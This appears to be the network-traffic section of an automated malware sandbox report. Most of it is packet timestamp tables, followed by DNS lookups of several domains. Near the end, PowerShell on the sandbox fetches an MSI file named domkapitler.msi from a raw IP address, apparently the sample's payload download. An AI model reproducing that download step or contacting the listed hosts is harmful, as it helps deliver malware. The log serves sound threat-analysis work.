                                                Apr 26, 2024 21:56:29.241290092 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.241302013 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.241321087 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.241344929 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.473393917 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.473412037 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.473423958 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.473438025 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.473480940 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.473520041 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.473531961 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.473562956 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.473608017 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.473659039 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.473747015 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.473790884 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.473814964 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.473874092 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.473916054 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.473937988 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474000931 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474045992 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.474081039 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474131107 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474176884 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.474211931 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474255085 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.474278927 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474348068 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474381924 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474390984 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.474419117 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.474457979 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474519014 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474561930 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.474814892 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474889040 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.474931955 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.474952936 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475027084 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475070953 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.475114107 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475191116 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475233078 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.475258112 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475323915 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475368977 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.475403070 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475451946 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475495100 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.475524902 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475563049 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475604057 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475605965 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.475673914 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475711107 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475712061 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.475739956 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475776911 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.475867033 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.475960970 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476006031 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.476008892 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476022005 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476058960 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.476120949 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476210117 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476255894 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.476259947 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476301908 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.476310015 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476353884 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476403952 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.476449966 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476490974 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476535082 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.476569891 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476660967 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.476706028 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.476746082 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.477022886 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.477205992 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.477262020 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.477303982 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.477322102 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.477413893 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.477456093 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.477718115 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.477801085 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.477844000 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.478286982 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.478328943 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.478377104 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.478405952 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.478447914 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.478456020 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.478528976 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.478573084 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.478574038 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.478653908 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.478696108 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.478719950 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.478794098 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.478835106 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.478864908 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.478954077 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479002953 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.479027033 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479090929 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479114056 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479137897 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.479150057 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.479176998 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479228020 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479269981 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.479288101 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479332924 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479373932 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.479398012 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479475975 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479517937 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.479602098 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479682922 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479724884 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.479742050 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479844093 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.479882956 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.706285000 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.706346035 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.706367970 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.706399918 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.706412077 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.706449986 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.706494093 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.706547022 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.706830025 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.706891060 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.707398891 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.707446098 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.707530975 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.707570076 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.707663059 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.707700014 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.707707882 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.707746029 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.707781076 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.707820892 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.707844973 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.707884073 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.707917929 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.707957029 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.708087921 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.708123922 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.708194017 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.708239079 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.708260059 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.708300114 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.708316088 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.708354950 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.708381891 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.708410978 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.708417892 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.708447933 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.708539963 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.708579063 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.708615065 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.708652973 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.708724976 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.708762884 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.708786011 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.708823919 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.708969116 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.709016085 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.709041119 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.709086895 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.709170103 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.709214926 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.709492922 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.709538937 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.709630013 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.709670067 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.709706068 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.709743023 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.709775925 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.709810972 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.709887028 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.709924936 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.709933996 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.709964991 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.710042953 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.710082054 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.710103989 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.710136890 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.710161924 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.710196018 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.710217953 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.710254908 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.710278988 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.710315943 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.710445881 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.710484982 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.710510015 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.710549116 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.710619926 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.710659981 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.710706949 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.710741997 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.711096048 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.711138964 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.711154938 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.711204052 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.711220026 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.711256981 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.711436987 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.711474895 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.711493969 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.711532116 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.711592913 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.711606026 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.711632967 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.711646080 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.711699963 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.711739063 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.711781025 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.711816072 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.711915970 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.711951017 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.711975098 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.712017059 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.712043047 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.712081909 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.712131977 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.712172985 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.712207079 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.712245941 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.712261915 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.712291956 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.712301970 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.712337017 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.712372065 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.712413073 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.712435961 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.712474108 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.712531090 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.712543964 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:29.712568045 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:29.712589979 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:34.475413084 CEST804970787.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:34.475492001 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:41.365979910 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:55.564433098 CEST4970780192.168.2.687.121.105.163
                                                Apr 26, 2024 21:57:13.286078930 CEST4970980192.168.2.6192.185.96.244
                                                Apr 26, 2024 21:57:14.300770998 CEST4970980192.168.2.6192.185.96.244
                                                Apr 26, 2024 21:57:16.300839901 CEST4970980192.168.2.6192.185.96.244
                                                Apr 26, 2024 21:57:20.300761938 CEST4970980192.168.2.6192.185.96.244
                                                Apr 26, 2024 21:57:28.300771952 CEST4970980192.168.2.6192.185.96.244
                                                Apr 26, 2024 21:57:40.012093067 CEST4971180192.168.2.645.194.181.142
                                                Apr 26, 2024 21:57:40.377865076 CEST804971145.194.181.142192.168.2.6
                                                Apr 26, 2024 21:57:40.378027916 CEST4971180192.168.2.645.194.181.142
                                                Apr 26, 2024 21:57:40.380347013 CEST4971180192.168.2.645.194.181.142
                                                Apr 26, 2024 21:57:40.720160007 CEST804971145.194.181.142192.168.2.6
                                                Apr 26, 2024 21:57:49.496485949 CEST804971145.194.181.142192.168.2.6
                                                Apr 26, 2024 21:57:49.496514082 CEST804971145.194.181.142192.168.2.6
                                                Apr 26, 2024 21:57:49.496655941 CEST4971180192.168.2.645.194.181.142
                                                Apr 26, 2024 21:57:51.606206894 CEST4971180192.168.2.645.194.181.142
                                                Apr 26, 2024 21:57:52.573107958 CEST4971180192.168.2.645.194.181.142
                                                Apr 26, 2024 21:57:54.457210064 CEST4971180192.168.2.645.194.181.142
                                                Apr 26, 2024 21:57:54.804198027 CEST804971145.194.181.142192.168.2.6
                                                Apr 26, 2024 21:57:57.102736950 CEST4971280192.168.2.623.82.11.73
                                                Apr 26, 2024 21:57:57.257757902 CEST804971223.82.11.73192.168.2.6
                                                Apr 26, 2024 21:57:57.257863998 CEST4971280192.168.2.623.82.11.73
                                                Apr 26, 2024 21:57:57.259561062 CEST4971280192.168.2.623.82.11.73
                                                Apr 26, 2024 21:57:57.416621923 CEST804971223.82.11.73192.168.2.6
                                                Apr 26, 2024 21:57:58.769880056 CEST4971280192.168.2.623.82.11.73
                                                Apr 26, 2024 21:57:58.925026894 CEST804971223.82.11.73192.168.2.6
                                                Apr 26, 2024 21:57:58.925168037 CEST4971280192.168.2.623.82.11.73
                                                Apr 26, 2024 21:57:59.790991068 CEST4971380192.168.2.623.82.11.73
                                                Apr 26, 2024 21:57:59.945996046 CEST804971323.82.11.73192.168.2.6
                                                Apr 26, 2024 21:57:59.946131945 CEST4971380192.168.2.623.82.11.73
                                                Apr 26, 2024 21:57:59.947913885 CEST4971380192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:00.102390051 CEST804971323.82.11.73192.168.2.6
                                                Apr 26, 2024 21:58:01.457412004 CEST4971380192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:01.612263918 CEST804971323.82.11.73192.168.2.6
                                                Apr 26, 2024 21:58:01.612384081 CEST4971380192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:03.577410936 CEST4971480192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:03.732413054 CEST804971423.82.11.73192.168.2.6
                                                Apr 26, 2024 21:58:03.732527018 CEST4971480192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:03.745702028 CEST4971480192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:03.904526949 CEST804971423.82.11.73192.168.2.6
                                                Apr 26, 2024 21:58:03.904565096 CEST804971423.82.11.73192.168.2.6
                                                Apr 26, 2024 21:58:05.254246950 CEST4971480192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:05.409182072 CEST804971423.82.11.73192.168.2.6
                                                Apr 26, 2024 21:58:05.409387112 CEST4971480192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:06.279005051 CEST4971580192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:06.434410095 CEST804971523.82.11.73192.168.2.6
                                                Apr 26, 2024 21:58:06.434627056 CEST4971580192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:06.440747023 CEST4971580192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:06.599992990 CEST804971523.82.11.73192.168.2.6
                                                Apr 26, 2024 21:58:08.116264105 CEST804971523.82.11.73192.168.2.6
                                                Apr 26, 2024 21:58:08.116306067 CEST804971523.82.11.73192.168.2.6
                                                Apr 26, 2024 21:58:08.118719101 CEST4971580192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:08.118719101 CEST4971580192.168.2.623.82.11.73
                                                Apr 26, 2024 21:58:08.273402929 CEST804971523.82.11.73192.168.2.6
                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 26, 2024 21:57:13.000581980 CEST5613553192.168.2.61.1.1.1
                                                Apr 26, 2024 21:57:13.280282974 CEST53561351.1.1.1192.168.2.6
                                                Apr 26, 2024 21:57:39.326839924 CEST6217553192.168.2.61.1.1.1
                                                Apr 26, 2024 21:57:40.009624958 CEST53621751.1.1.1192.168.2.6
                                                Apr 26, 2024 21:57:56.616869926 CEST5216553192.168.2.61.1.1.1
                                                Apr 26, 2024 21:57:57.100467920 CEST53521651.1.1.1192.168.2.6
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Apr 26, 2024 21:57:13.000581980 CEST192.168.2.61.1.1.10x7deaStandard query (0)www.barpa.beA (IP address)IN (0x0001)false
                                                Apr 26, 2024 21:57:39.326839924 CEST192.168.2.61.1.1.10xff41Standard query (0)www.jackcliu.comA (IP address)IN (0x0001)false
                                                Apr 26, 2024 21:57:56.616869926 CEST192.168.2.61.1.1.10x95f3Standard query (0)www.smartfindsdepot.shopA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Apr 26, 2024 21:57:13.280282974 CEST1.1.1.1192.168.2.60x7deaNo error (0)www.barpa.bebarpa.beCNAME (Canonical name)IN (0x0001)false
                                                Apr 26, 2024 21:57:13.280282974 CEST1.1.1.1192.168.2.60x7deaNo error (0)barpa.be192.185.96.244A (IP address)IN (0x0001)false
                                                Apr 26, 2024 21:57:40.009624958 CEST1.1.1.1192.168.2.60xff41No error (0)www.jackcliu.com45.194.181.142A (IP address)IN (0x0001)false
                                                Apr 26, 2024 21:57:57.100467920 CEST1.1.1.1192.168.2.60x95f3No error (0)www.smartfindsdepot.shop23.82.11.73A (IP address)IN (0x0001)false
                                                • 87.121.105.163
                                                • www.jackcliu.com
                                                • www.smartfindsdepot.shop
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.64969987.121.105.163807108C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 26, 2024 21:56:05.187163115 CEST173OUTGET /domkapitler.msi HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: 87.121.105.163
                                                Connection: Keep-Alive
                                                Apr 26, 2024 21:56:05.428404093 CEST1289INHTTP/1.1 200 OK
                                                Date: Fri, 26 Apr 2024 19:56:05 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Last-Modified: Fri, 26 Apr 2024 06:33:30 GMT
                                                ETag: "6c554-616fa14fca280"
                                                Accept-Ranges: bytes
                                                Content-Length: 443732
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/x-msi
